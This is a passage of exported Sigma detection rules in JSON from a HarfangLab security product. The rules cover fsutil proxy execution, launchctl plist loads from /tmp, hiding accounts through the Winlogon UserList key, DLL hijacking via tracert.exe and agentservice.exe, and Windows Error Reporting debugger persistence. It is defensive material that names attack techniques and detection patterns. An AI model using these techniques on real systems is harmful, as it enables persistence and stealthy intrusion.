"rule_description": "Detects a process being spawned by EdgeTransport.exe, the Microsoft Exchange transport service, other than a small set of signed Microsoft components (e.g. conhost.exe, WerFault.exe) and known third-party add-ins.\nAttackers can install malicious transport agents on a compromised Exchange server. Because transport agents are loaded as DLLs inside EdgeTransport.exe, any process they spawn appears as a child of EdgeTransport.exe.\nAttackers use this technique to achieve persistence on an Exchange server; the malicious DLL also sees every email transiting through the server and can act as a command and control component (see the LightNeuron report in the references).\nIt is recommended to investigate the process started by EdgeTransport.exe (command line, signature, parent context) and to review the list of installed transport agents for recent or unexpected additions.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-10-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0336133-51c0-4663-bf67-46f321345247",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086724Z",
"creation_date": "2026-03-23T11:45:34.086726Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086731Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Fsutil/",
"https://twitter.com/0gtweet/status/1720724516324704404",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_fsutil_proxy_execution.yml",
"content": "title: Proxy Execution via fsutil.exe\nid: c0336133-51c0-4663-bf67-46f321345247\ndescription: |\n Detects a process named netsh.exe whose original file name is not netsh.exe, started as a grandchild of fsutil.exe running 'trace decode'.\n fsutil.exe is a legitimate filesystem management tool, but 'fsutil trace decode' launches netsh.exe in a way that lets a pre-planted binary of that name run instead of the system one (see the LOLBAS entry), proxying execution of a malicious payload under a trusted Windows utility.\n It is recommended to analyze both the parent process of fsutil.exe and the process masquerading as netsh.exe (path, signature, original file name) to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Fsutil/\n - https://twitter.com/0gtweet/status/1720724516324704404\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/11/14\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Fsutil\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n GrandparentImage|endswith: 'fsutil.exe'\n GrandparentCommandLine|contains: ' trace decode'\n Image|endswith: '\\netsh.exe'\n\n filter_netsh:\n OriginalFileName: 'netsh.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0336133-51c0-4663-bf67-46f321345247",
"rule_name": "Proxy Execution via fsutil.exe",
"rule_description": "Detects a process named netsh.exe whose original file name is not netsh.exe, started as a grandchild of fsutil.exe running 'trace decode'.\nfsutil.exe is a legitimate filesystem management tool, but 'fsutil trace decode' launches netsh.exe in a way that lets a pre-planted binary of that name run instead of the system one (see the LOLBAS entry), proxying execution of a malicious payload under a trusted Windows utility.\nIt is recommended to analyze both the parent process of fsutil.exe and the process masquerading as netsh.exe (path, signature, original file name) to look for malicious content or actions.\n",
"rule_creation_date": "2023-11-14",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0445b10-0789-4ae9-97f6-b85754b5bd8b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095124Z",
"creation_date": "2026-03-23T11:45:34.095126Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095130Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1569/001/"
],
"name": "t1569_001_plist_loaded_suspicious_folder.yml",
"content": "title: Plist File Loaded from Suspicious Location\nid: c0445b10-0789-4ae9-97f6-b85754b5bd8b\ndescription: |\n Detects a plist file being loaded with 'launchctl load' from a suspicious location: /tmp, /private/tmp, /var or /Users/Shared, given either as an absolute path or as a bare file name while the current directory is one of those folders.\n Attackers can manually load plist files to register launch agents and achieve persistence, and world-writable or staging folders such as these are typical drop locations.\n Only the legacy 'load' subcommand is matched; loads performed with the newer 'bootstrap' subcommand are not covered by this rule.\n It is recommended to investigate the content of the plist file (in particular which program it runs and whether it starts automatically) and the ancestors of the launchctl process to determine whether this action was legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1569/001/\ndate: 2024/07/03\nmodified: 2025/03/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.ServiceCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/bin/launchctl'\n\n # Either from a different folder and using global paths\n # Matches 'launchctl load /tmp/com.fake.name.plist' etc.\n selection_commandline:\n CommandLine|re:\n - '(?i) load /tmp/[^/]+\\.plist'\n - '(?i) load /private/tmp/[^/]+\\.plist'\n - '(?i) load /var/[^/]+\\.plist'\n - '(?i) load /Users/Shared/[^/]+\\.plist'\n\n # Or from the folders themselves\n # Matches 'launchctl load ./com.fake.name.plist', or 'launchctl load com.fake.name.plist', etc. run from a suspicious folder\n selection_current_folder:\n CurrentDirectory:\n - '/tmp/'\n - '/private/tmp/'\n - '/var/'\n - '/Users/Shared/'\n CommandLine|re: '(?i) load (?:\\./)?[^/]+\\.plist'\n\n condition: selection and 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0445b10-0789-4ae9-97f6-b85754b5bd8b",
"rule_name": "Plist File Loaded from Suspicious Location",
"rule_description": "Detects a plist file being loaded with 'launchctl load' from a suspicious location: /tmp, /private/tmp, /var or /Users/Shared, given either as an absolute path or as a bare file name while the current directory is one of those folders.\nAttackers can manually load plist files to register launch agents and achieve persistence, and world-writable or staging folders such as these are typical drop locations.\nOnly the legacy 'load' subcommand is matched; loads performed with the newer 'bootstrap' subcommand are not covered by this rule.\nIt is recommended to investigate the content of the plist file (in particular which program it runs and whether it starts automatically) and the ancestors of the launchctl process to determine whether this action was legitimate.\n",
"rule_creation_date": "2024-07-03",
"rule_modified_date": "2025-03-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c0445b7c-3f2f-473b-8737-4e9e2d8969f3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620363Z",
"creation_date": "2026-03-23T11:45:34.620365Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620369Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://superuser.com/questions/618555/what-values-are-defined-for-the-specialaccounts-userlist-key-and-what-i-is-their",
"https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
"https://twitter.com/malmoeb/status/1496875024254640129",
"https://attack.mitre.org/techniques/T1564/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_winlogon_special_account_modification.yml",
"content": "title: User Account Hidden from User Lists\nid: c0445b7c-3f2f-473b-8737-4e9e2d8969f3\ndescription: |\n Detects the modification of the \"Winlogon\\SpecialAccounts\\UserList\" registry key.\n This may help an attacker hide an account from the welcome screen or control panel.\n The DWORD value 0 hides the user on the Welcome screen, but he is still visible in the Control Panel.\n The DWORD value 1 shows the user on the Welcome screen and Control Panel.\n The DWORD value 65536 hides the user from the Welcome screen and the Control Panel.\n It is recommended to analyze the process responsible for the registry modification as well as to determine the legitimacy of the user account added to the SpecialAccounts key.\nreferences:\n - https://superuser.com/questions/618555/what-values-are-defined-for-the-specialaccounts-userlist-key-and-what-i-is-their\n - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\n - https://twitter.com/malmoeb/status/1496875024254640129\n - https://attack.mitre.org/techniques/T1564/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2022/12/01\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\'\n\n filter_showuser:\n Details: 'DWORD (0x00000001)'\n\n filter_empty:\n Details:\n - ''\n - '(Empty)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - 
'?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_lenovo:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\lenovo_tmp_????????'\n\n exclusion_zenworks_dau:\n ProcessImage: '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\DAUHelper.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\DAU?-*'\n\n exclusion_sysmex_ipu:\n ProcessImage: '?:\\Program Files (x86)\\Sysmex\\IPUSRV\\IpuSrv.exe'\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\IPU*'\n\n exclusion_novell:\n ProcessImage:\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\DAUHelper.exe'\n - '?:\\Program Files (x86)\\Novell\\ZENworks\\bin\\ZenworksWindowsService.exe'\n\n exclusion_autoelevate_agent:\n ProcessImage:\n - '?:\\Program Files\\AutoElevate\\AutoElevateAgent.exe'\n - '?:\\Program Files (x86)\\AutoElevate\\AutoElevateAgent.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\~0000AEAdmin'\n\n exclusion_symex:\n ProcessOriginalFileName: 'IpuSrv.exe'\n ProcessCompany: 'Sysmex'\n\n exclusion_nomachine:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\nx'\n ProcessSigned: 'true'\n ProcessSignature: 'NoMachine S.a.r.l.'\n\n exclusion_citrix:\n ProcessImage: 
'?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\CtxPkmService'\n\n exclusion_schneider:\n ProcessImage: '?:\\Windows\\Installer\\MSI????.tmp'\n ProcessSigned: 'true'\n ProcessSignature: 'SCHNEIDER ELECTRIC USA, INC.'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\SE-Account'\n\n exclusion_bmc:\n ProcessOriginalFileName: 'mtxagent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'BMC Software France SAS'\n\n exclusion_postgres:\n ProcessParentImage|endswith:\n - '\\edb_pgagent_pg??.exe'\n - ':\\Windows\\System32\\msiexec.exe'\n - '\\postgresql-*-windows-x64.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\postgres'\n\n exclusion_setup:\n ProcessOriginalFileName: 'InstallShield Setup.exe'\n ProcessCompany:\n - 'GE Healthcare'\n - 'InBody'\n\n exclusion_oracle:\n ProcessOriginalFileName: 'ServiceHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n\n exclusion_pulse:\n ProcessCommandLine: 'REG ADD HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v pulseuser /t REG_DWORD /d 0 /f'\n ProcessGrandparentCommandLine: '?:\\\\PROGRA~1\\\\Python3\\\\python.exe ?:\\Program Files\\\\Python3\\\\Lib\\\\site-packages\\\\pulse_xmpp_agent\\\\connectionagent.py -t machine'\n\n exclusion_philips:\n ProcessImage|endswith: '\\IntelliSpace Perinatal\\Setup\\setup.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\OBTV Connect'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\\OBTV Internal 2'\n\n exclusion_amada:\n ProcessParentCommandLine: '?:\\Program Files (x86)\\AMADA3i\\DCOM Server\\DCOMSetting.exe'\n\n exclusion_scanner:\n ProcessCommandLine:\n - 'reg add 
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v scanner /t REG_DWORD /d 00000000'\n - 'REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v scanner /t REG_DWORD /d 00000000 /f'\n - 'REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList /v copieur /t REG_DWORD /d 0'\n ProcessParentCommandLine: '?:\\windows\\System32\\cmd.exe /C ?:\\\\*.bat'\n ProcessGrandparentCommandLine: '?:\\WINDOWS\\Explorer.EXE'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c0445b7c-3f2f-473b-8737-4e9e2d8969f3",
"rule_name": "User Account Hidden from User Lists",
"rule_description": "Detects the modification of the \"Winlogon\\SpecialAccounts\\UserList\" registry key.\nAn attacker may use this key to hide an account from the Welcome screen or the Control Panel; the value name is the name of the account being hidden.\nThe DWORD value 0 hides the account from the Welcome screen, but it remains visible in the Control Panel.\nThe DWORD value 1 shows the account on both the Welcome screen and the Control Panel.\nThe DWORD value 65536 (0x10000) hides the account from both the Welcome screen and the Control Panel.\nIt is recommended to analyze the process responsible for the registry modification and to determine the legitimacy of the user account added under the SpecialAccounts key.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1564.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c04bc942-714f-4a5c-ac7a-74f7e2982ad2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082065Z",
"creation_date": "2026-03-23T11:45:34.082067Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082071Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tracert.yml",
"content": "title: DLL Hijacking via tracert.exe\nid: c04bc942-714f-4a5c-ac7a-74f7e2982ad2\ndescription: |\n Detects potential Windows DLL Hijacking via tracert.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n The rule matches a tracert.exe signed by Microsoft Windows that runs from outside the Windows system directories and loads IPHLPAPI.DLL from a location that is also outside those directories and not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tracert.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\IPHLPAPI.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c04bc942-714f-4a5c-ac7a-74f7e2982ad2",
"rule_name": "DLL Hijacking via tracert.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tracert.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule matches a tracert.exe signed by Microsoft Windows that runs from outside the Windows system directories and loads IPHLPAPI.DLL from a location that is also outside those directories and not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c04f7e83-0aac-495c-8097-bbdc694cc38c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089622Z",
"creation_date": "2026-03-23T11:45:34.089624Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089629Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wer_debugger.html",
"https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
"https://attack.mitre.org/techniques/T1546/"
],
"name": "t1546_persistence_windows_error_reporting.yml",
"content": "title: Possible Windows Error Reporting Persistence Added\nid: c04f7e83-0aac-495c-8097-bbdc694cc38c\ndescription: |\n Detects the creation or modification of the Windows Error Reporting Hangs\\Debugger registry value, which makes WER launch the configured debugger when an application hangs.\n This method can be used to achieve persistence by replacing the debugger image with a malicious payload.\n It is recommended to investigate the process that set the registry value and the binary configured as a debugger for suspicious activity.\n Note that the rule excludes any value containing the string windbg.exe (a substring match), so the full path of the configured debugger should still be verified rather than trusted on its name alone.\nreferences:\n - https://persistence-info.github.io/Data/wer_debugger.html\n - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_windbg:\n Details|contains: 'windbg.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c04f7e83-0aac-495c-8097-bbdc694cc38c",
"rule_name": "Possible Windows Error Reporting Persistence Added",
"rule_description": "Detects the creation or modification of the Windows Error Reporting Hangs\\Debugger registry value, which makes WER launch the configured debugger when an application hangs.\nThis method can be used to achieve persistence by replacing the debugger image with a malicious payload.\nIt is recommended to investigate the process that set the registry value and the binary configured as a debugger for suspicious activity.\nNote that the rule excludes any value containing the string windbg.exe (a substring match), so the full path of the configured debugger should still be verified rather than trusted on its name alone.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "c076106d-84e0-4b78-bf21-d14cf99dd7ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587443Z",
"creation_date": "2026-03-23T11:45:34.587446Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587454Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_agentservice.yml",
"content": "title: DLL Hijacking via agentservice.exe\nid: c076106d-84e0-4b78-bf21-d14cf99dd7ed\ndescription: |\n Detects potential Windows DLL Hijacking via agentservice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n The rule matches an agentservice.exe signed by Microsoft Windows that runs from outside the Windows system directories and loads ACTIVEDS.dll, adsldpc.dll, FLTLIB.DLL or version.dll from a location that is also outside those directories and not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'agentservice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ACTIVEDS.dll'\n - '\\adsldpc.dll'\n - '\\FLTLIB.DLL'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "c076106d-84e0-4b78-bf21-d14cf99dd7ed",
"rule_name": "DLL Hijacking via agentservice.exe",
